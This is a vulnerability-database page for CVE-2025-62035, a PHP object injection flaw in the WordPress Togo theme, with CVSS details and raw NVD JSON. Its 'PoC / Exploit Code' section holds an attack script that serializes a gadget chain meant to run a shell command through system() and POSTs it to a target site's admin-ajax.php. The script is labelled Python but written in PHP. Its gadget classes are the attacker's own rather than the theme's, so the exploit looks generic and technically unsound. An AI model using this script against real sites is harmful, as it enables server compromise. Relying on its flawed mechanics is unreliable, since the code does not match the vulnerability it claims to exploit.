Security Vulnerability Report
中文
CVE-2025-62035 CVSS 8.8 HIGH

CVE-2025-62035

Published: 2025-11-06 16:16:10
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Togo Theme < 1.0.4
Togo Theme 1.0.0 through 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-62035 PoC - WordPress Togo Theme PHP Object Injection * Vulnerability: Deserialization of Untrusted Data * Affected: Togo Theme < 1.0.4 * * Usage: Modify target URL and execute via command line * php cve-2025-62035.py http://target.com/ */ class MaliciousPayload { public $callback; public function __construct() { // Pop chain to execute arbitrary command $this->callback = 'system'; } public function __wakeup() { // Triggered during deserialization if (isset($this->callback)) { call_user_func($this->callback, $this->cmd); } } } class GadgetChain { public $obj; public $cmd; public function __destruct() { // Chain to MaliciousPayload if (isset($this->obj)) { $this->obj->cmd = $this->cmd; unserialize(serialize($this->obj)); } } } // Generate malicious serialized payload $payload = new GadgetChain(); $payload->obj = new MaliciousPayload(); $payload->cmd = 'id > /tmp/pwned'; // Command to execute $exploit = serialize($payload); echo "Generated Payload: " . base64_encode($exploit) . "\n"; // For HTTP POST exploitation $data = [ 'action' => 'togo_ajax_action', 'data' => $exploit ]; // Send exploit request $ch = curl_init($argv[1] . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "Exploit sent. Check /tmp/pwned on target server.\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62035", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:09.780", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/togo/vulnerability/wordpress-togo-theme-1-0-4-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}